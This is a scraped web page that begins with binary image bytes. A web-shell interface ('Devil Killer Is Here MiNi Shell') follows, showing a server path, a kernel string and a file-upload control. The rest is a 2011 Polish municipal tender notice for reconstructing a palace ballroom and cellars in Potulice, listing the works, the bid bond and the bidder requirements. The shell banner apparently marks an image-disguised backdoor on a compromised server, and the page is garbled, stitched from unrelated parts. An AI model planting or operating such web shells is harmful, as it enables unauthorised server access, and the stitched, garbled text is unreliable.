JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110506/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110506/131253-N-2011.html

<p class="kh_header"><b>Nakło nad Notecią: Rekonstrukcja Pałacu Hrabiny Anieli Potulickiej w części Sali Balowej i podziemi 
w Potulicach</b><br>
<b>Numer ogłoszenia: 131253 - 2011; data zamieszczenia: 06.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta i Gminy w Nakle nad Notecią , ul. Ks. P. Skargi 7, 89-100 Nakło nad Notecią, woj. kujawsko-pomorskie, tel. 052 3867987, 3867984, faks 052 3867981.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.naklo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rekonstrukcja Pałacu Hrabiny Anieli Potulickiej w części Sali Balowej i podziemi 
w Potulicach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest modernizacja części pałacu w Potulicach polegająca na wykonaniu robót budowlanych, instalacyjnych: wod.-kan., c.w., c.o. wraz z kotłownią oraz wentylacji mechanicznej. 
Wykaz pomieszczeń objętych przedmiotem zamówienia:
1)zlokalizowanych na parterze budynku: 
a)sala seminaryjno-konferencyjna, 
b)pomieszczenia pomocnicze - zaplecze sali,
c)holl  wejściowy  i szatnia,
d)sanitariaty,

2)zlokalizowanych w piwnicy:
    kotłownia z pomieszczeniem pomocniczym.
 Opis przyjętych rozwiązań  dla  poszczególnych pomieszczeń
1)Sala konferencyjna
Opis ogólny przyjętych rozwiązań. W pomieszczeniu przeznaczonym  na salę 
seminaryjno-konferencyjną należy zdemontować  wszystkie elementy wyposażenia i wykończenia takie jak: słupy sceny, podium, ścianę oddzielającą widownię         od zaplecza sceny, obudowy ryzalitów  oraz obudowy  grzejników i płyty sufitu. Istniejący parkiet 	przewidziano do demontażu. 
Remont  sali  seminaryjno-konferencyjnej obejmuje:
a)wymianę stolarki okiennej - 9 szt. okien + 1 szt. okna nad drzwiami 
wyjściowymi (D3) w ścianie zachodniej,
b)wymianę drzwi wejściowych  z holu do sali konferencyjnej: 
   drzwi D1  - 2 szt.,
   drzwi D2  - 1 szt.
c)wymianę drzwi wyjściowych na taras w ścianie zachodniej - D3 - 1 szt.,
d)wykonanie nowej instalacji co, wentylacji mechanicznej  i elektrycznej,
e)wykonanie sufitu wraz z ociepleniem stropodachu,
f)demontaż zniszczonej posadzki parkietowej i montaż nowej posadzki oraz 
   wykonanie podium,
g)wykończenie ścian.

2)Pomieszczenia pomocnicze.
W pomieszczeniu pomocniczym przewidziano demontaż drzwi między
pomieszczeniami i obudowę drewnianą ościeżnicą. Nad pasem szafek
i zlewozmywakiem wykonać pas glazury szerokości 60 cm w kolorze białym.
Okna (2 szt.) w ścianie południowej do rekonstrukcji, zgodnie z przyjętą zasadą,
odtworzenia istniejącego okna skrzynkowego z uwzględnieniem elementu
dekoracyjnego ramiaka zewnętrznego charakterystycznego dla pozostałych     
okien  w skrzydle wschodnim. Przy demontażu i montażu okna chronić elementy
portalu okiennego przewidzianego do odtworzenia w czasie prac elewacyjnych. 
Posadzka w obu pomieszczeniach jest kontynuacją posadzki holu. Powierzchnia 
pomieszczenia  -13.7 m2 .
3) Hol wejściowy i szatnia
Realizacja ścianki przeszklonej i  posadzki 
Dla podkreślenia autentyczności miejsca pozostaną w wyznaczonych miejscach 
fragmenty istniejącej posadzki oraz schody prowadzące do piwnicy. 
Dane techniczne ściany przeszklonej:
a)ściana na pełną wysokość 3,05m,
b)długość ściany 270 cm + 173cm +143cm,
c)wypełnienie szkłem bezpiecznym P2 pojedyńczym, 
d)samonośna w konstrukcji z profili aluminiowych 37x 47 mm górna i dolna
   listwa,
e)połączenie pionowe tafli szklanych z uszczelek silikonowych,
f)drzwi przeszklone z samozamykaczem w ramie z profili aluminiowych,
g)przeszklenie narożnikowe, bez profili aluminiowych w narożnikach, profile 
   aluminiowe przy ścianie,
h)grubość szklenia  - 12mm, uzgodnić dodatkowo z dostawcą ściany.
   Wykończenie ścian
   Po zbiciu nietrwałych tynków należy je uzupełnić i wykonać gładź gipsową. Ściany
   malowane farbą akrylową w kolorze NCS -S 2005-Y80R.
   Drzwi i okna
   Drzwi do sanitariatów i pomieszczeń pomocniczych płycinowe  wykończone 
   fornirem dębowym - kolor jak drzwi do Sali, zabezpieczone lakierem  
   wodoodpornym. 	Ościeżnica z płyt drewnopodobnych. Istniejące okna 
   skrzynkowe do odtworzenia, z uwzględnieniem elementu dekoracyjnego ramiaka 
   zewnętrznego charakterystycznego dla pozostałych okien w skrzydle wschodnim,
   zgodnie z załączonym rysunkiem - wymiana istniejących. 
4)Sanitariaty
Należy wykonać następujące sanitariaty: 
sanitariat dla mężczyzn -  pow. - 6.70 m2,
sanitariat dla pań - pow. - 4.28 m2,
 sanitariat  dla niepełnosprawnych - pow.- 4.87 m2.
Sanitariaty dla mężczyzn i kobiet wydzielono ścianą na pełną wysokość od przedsionków stanowiących śluzę między komunikacją a sanitariatami. 
Wyposażenie sanitariatów :
Wymiana stolarki okiennej 
Wymiana okna w sanitariacie dla kobiet zgodnie z przyjętą zasadą, odtworzenie
istniejącego okna skrzynkowego z uwzględnieniem elementu dekoracyjnego
ramiaka zewnętrznego charakterystycznego dla pozostałych okien w skrzydle
wschodnim.
Realizacja posadzki 
Posadzka w sanitariatach jest kontynuacją nowej posadzki z holu, te same płyty
i kierunek spoin. 
Przyjęto następujące uwarstwienia:
posadzka ceramiczna z granitogresu - klasa R-10,
elastyczna zaprawa klejowa cienkowarstwowa,
izolacja powłokowa z wywinięciem na ściany pionowe na wys. 30 cm,
warstwa samopoziomujaca, 
jastrych cementowy,
 różnice poziomów niwelować warstwą twardego styropianu lub styroduru.
Wykończenie ścian
Do wysokości 2.05 m ściany wyłożyć poziomo płytami glazury białej, matowej o 30x40  dając na wysokości 1.50 pas w kolorze kontrastowym.
Na wysokości 2,70 należy zamocować strop podwieszony z płyt wodoodpornych
gipsowo - kartonowych na konstrukcji systemowej, kryjący poziome kanały wentylacji grawitacyjnej oraz rury instalacji. Przestrzeń nad stropem podwieszonym należy wentylować .
5)  Kotłownia z pomieszczeniem technicznym - roboty budowlane i instalacyjne..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Powtórzenie tego samego rodzaju zamówienia , które zostało określone 
w zamówieniu podstawowym, zawartym w SIWZ, dokumentacji projektowej oraz w STWiORB.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.26.25.00-6, 45.31.00.00-3, 45.32.00.00-6, 45.32.40.00-4, 45.33.11.00-7, 45.40.00.00-1, 45.42.10.00-4, 45.44.21.00-8, 45.45.00.00-6, 45.45.30.00-7, 45.33.12.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 09.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Wysokość wadium ustala się w kwocie 15.000,00 złotych (słownie: piętnaście
tysięcy złotych 00/100). 
2.Wadium w formie pieniężnej należy wnieść przelewem na rachunek bankowy
Zamawiającego: 
Bank Spółdzielczy Nakło nad Notecią:
Nr rachunku: 11 8179 0009 0000 3014 2000 0020
z dopiskiem na blankiecie przelewu:
Wadium na zabezpieczenie oferty przetargowej dla zadania:

Rekonstrukcja Pałacu Hrabiny Anieli Potulickiej
w części Sali Balowej i podziemi w Potulicach

3.Kserokopię dowodu przelewu potwierdzoną za zgodność z oryginałem należy dołączyć	do oferty.
4.Wadium może być wnoszone w formie: poręczenia bankowego, poręczenia
pieniężnego SKOK, gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczeniach 	udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia  9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości 	(Dz.U. z 2007 r. Nr 42, poz. 275 ze zm.), które należy w formie nienaruszonego oryginału 	zdeponować w kasie u Zamawiającego, a kopię załączyć do oferty.
5.Z treści gwarancji powinno wynikać bezwarunkowe i nieodwołalne, na pierwsze pisemne żądanie zgłoszone przez Zamawiającego w okresie związania ofertą, zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a i 5  pzp.
6.Treść gwarancji wadialnej musi zawierać następujące elementy:
1)nazwa i adres Zamawiającego;
2)określenie przedmiotu zamówienia;
3)nazwę i adres Wykonawcy;
4)zobowiązanie gwaranta o poddaniu się rygorowi określonemu w ust.5.
7.Wadium musi być wniesione nie później niż do  wyznaczonego terminu składania ofert.
8.Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie rachunek bankowy Zamawiającego zostanie uznany pełną kwotą wymaganego wadium.
9.Wykonawca, który nie wniesie wadium lub nie zabezpieczy oferty akceptowalną formą wadium w wyznaczonym terminie, zostanie wykluczony z postępowania, a jego oferta zostanie odrzucona.
10.Zamawiający zwróci niezwłocznie wadium wszystkim Wykonawcom po wyborze oferty najkorzystniejszej, z wyjątkiem Wykonawcy, którego oferta została wybrana, jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a pzp.
11.Zamawiający zwróci niezwłocznie wadium wszystkim Wykonawcom po unieważnieniu postępowania o udzielenie niniejszego zamówienia publicznego, pod warunkiem,iż odwołanie zostało ostatecznie rozstrzygnięte lub upłynął termin do jego wnoszenia.
12.Zamawiający będzie żądał ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium w sytuacji, jak w ust.10, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wniesie wadium w terminie określonym przez Zamawiającego.
13.W przypadku wniesienia odwołania, Zamawiający nie później niż na 7 dni przed upływem ważności wadium, wezwie Wykonawców, pod rygorem wykluczenia z postępowania, do przedłużenia ważności wadium albo wniesienia nowego wadium na okres niezbędny do zabezpieczenia postępowania do zawarcia umowy. Jeżeli odwołanie wniesiono po wyborze oferty najkorzystniejszej, wezwanie skieruje jedynie do Wykonawcy, którego ofertę wybrano jako najkorzystniejszą.

14.Zatrzymanie wadium nastąpi w okolicznościach:
1)jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 pzp,nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 pzp, lub pełnomocnictw,
2)jeżeli Wykonawca w odpowiedzi na wezwanie złożył wymagane oświadczenia lub
dokumenty, ale z treści ich nie wynika, że Wykonawca spełnia warunki udziału
w postępowaniu,
3)jeżeli Wykonawca odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
4)jeżeli Wykonawca był zobowiązany i nie wniósł wymaganego zabezpieczenia
należytego wykonania umowy,
5)jeżeli zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe
z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy w okresie ostatnich 
pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia 
działalności jest krótszy - w tym okresie, wykonali co najmniej jedną robotę  budowlaną polegającą na budowie, przebudowie lub remoncie
obiektu 	o zakresie i charakterze porównywalnym z zakresem przedmiotu
zamówienia, o wartości nie mniejszej niż 700.000,- zł., słownie (siedemset
tysięcy złotych 00/100). Zakres wykonanych robót winien obejmować również
prace związane z odtworzeniem i zamontowaniem stolarki zabytkowej, której
wykonanie powinno być potwierdzone przez Konserwatora Zabytków. 
Ocena spełniania warunku będzie dokonana na podstawie złożonego wykazu wykonanych robót budowlanych i dokumentów potwierdzających, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone; na zasadzie spełnia/nie spełnia. Ponadto do oferty należy dołączyć dokument od Konserwatora Zabytków potwierdzający, iż Wykonawca posiada przygotowanie zawodowe do prowadzenia prac renowacyjnych  i rekonstrukcyjnych stolarki okiennej i drzwiowej w obiektach zabytkowych.  
Wykonawca może polegać na wiedzy i doświadczeniu innego lub innych podmiotów, niezależnie od charakteru prawnego łączącego ich stosunku. 
W takiej sytuacji Wykonawca zobowiązany będzie udowodnić, iż będzie dysponował wiedzą i doświadczeniem niezbędnym do realizacji zamówienia, w szczególności przedstawiając pisemne zobowiązanie i niezbędne dokumenty tych podmiotów do oddania do dyspozycji prawa korzystania z ich wiedzy  i doświadczenia na okres korzystania z nich przy wykonywaniu zamówienia (poprzez wypełnienie tego warunku należy rozumieć nie tylko dysponowanie dokumentami potwierdzającymi wiedzę i doświadczenia, ale przede wszystkim 	zobowiązanie się do wykonania części zamówienia dotyczącego robót budowlanych lub oddanie do dyspozycji Wykonawcy, co najmniej kadry kierowania budową, która posiada wymagane uprawnienia oraz doświadczenie albo oddanie do dyspozycji Wykonawcy osób odpowiedzialnych za kierowanie budową i zobowiązanie do stałej usługi doradztwa w zakresie wykonywania przedmiotu zamówienia).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy dysponują lub będą
dysponować osobami zdolnymi do wykonania zamówienia tj.:
a)Kierownikiem Budowy z uprawnieniami do wykonywania samodzielnych funkcji
technicznych w budownictwie o specjalności konstrukcyjno - budowlanej bez
ograniczeń, który posiada doświadczenie przy kierowaniu  co najmniej 1 budową
wpisaną do rejestru zabytków lub ewidencji zabytków.
b)kierownikami robót: jeden z uprawnieniami do wykonywania samodzielnych
funkcji technicznych w budownictwie o specjalności instalacyjnej w zakresie
sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych
i kanalizacyjnych bez ograniczeń  oraz  jeden z uprawnieniami do wykonywania samodzielnych funkcji technicznych w budownictwie o specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych 	bez ograniczeń; 
c)kierownik budowy i kierownicy robót muszą posiadać stwierdzenie
przygotowania zawodowego do wykonywania samodzielnych funkcji
technicznych w budownictwie (uprawnienia), wpis na listę właściwej Okręgowej Izby Samorządu Zawodowego, a w odniesieniu do obywateli państw
członkowskich, osoba która nabyła kwalifikacje zawodowe do wykonywania
działalności w budownictwie, równoznacznej wykonywaniu samodzielnych 
funkcji technicznych w budownictwie na terytorium Rzeczypospolitej Polskiej,
odpowiadające wymaganiom określonym w ustawie Prawo budowlane oraz 
posiada odpowiednią decyzję o uznaniu kwalifikacji zawodowych i posiada
zaświadczenia wymagane przez właściwe organy państw członkowskich, 
zgodnie z przepisami prawa Unii Europejskiej
Ocena spełniania warunku zostanie dokonana na podstawie złożonego wykazu
osób, które będą uczestniczyć w wykonywaniu zamówienia oraz oświadczenia,
że osoby te posiadają wymagane uprawnienia, kwalifikacje i doświadczenie, na zasadzie spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy posiadają środki finansowe (lub zdolność kredytową) w wysokości co najmniej  200 000,00 zł (słownie: dwieście tysięcy złotych 00/100).
Ocena spełniania warunku zostanie dokonana na podstawie złożonej informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których Wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, na zasadzie spełnia / nie spełnia.
Jeżeli Wykonawca, wykazując spełnianie wymienionego warunku, polega na zdolnościach finansowych innych podmiotów, zobowiązany będzie do przedłożenia informacji, o której mowa w rozdziale VII ust.1 pkt. 2 lit.e, dotyczącej tych podmiotów.
Jeżeli z uzasadnionych przyczyn Wykonawca nie będzie mógł przedstawić wymaganych przez Zamawiającego dokumentów dotyczących sytuacji finansowej,  to będzie mógł przedstawić inny dokument, który w wystarczający sposób potwierdzi spełniania tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1. Harmonogram rzeczowo - finansowy wykonania robót sporządzony z uwzględnieniem uwarunkowań, określonych w rozdziale IV, ust. 5, pkt 12 .
2. Kosztorys ofertowy opracowany metodą szczegółową, zgodnie z zasadami określonymi w rodziale XII, ust. 3.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Dokumenty potwierdzające, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone, wydane m.in. przez Konserwatora Zabytków (dla robót związanych z odtworzeniem i montażem stolarki drzwiowej i okiennej w obiektach zabytkowych).
2. W celu stwierdzenia, czy osoba podpisująca oświadczenia woli lub udzielająca
 pełnomocnictwa posiada do tego uprawnienia, do oferty należy załączyć aktualny 
odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem
terminu składania ofert. 
3.W przypadku Wykonawców wspólnie ubiegających się o zamówienie -
 pełnomocnictwo do reprezentowania ich w postępowaniu o udzielenie zamówienia 
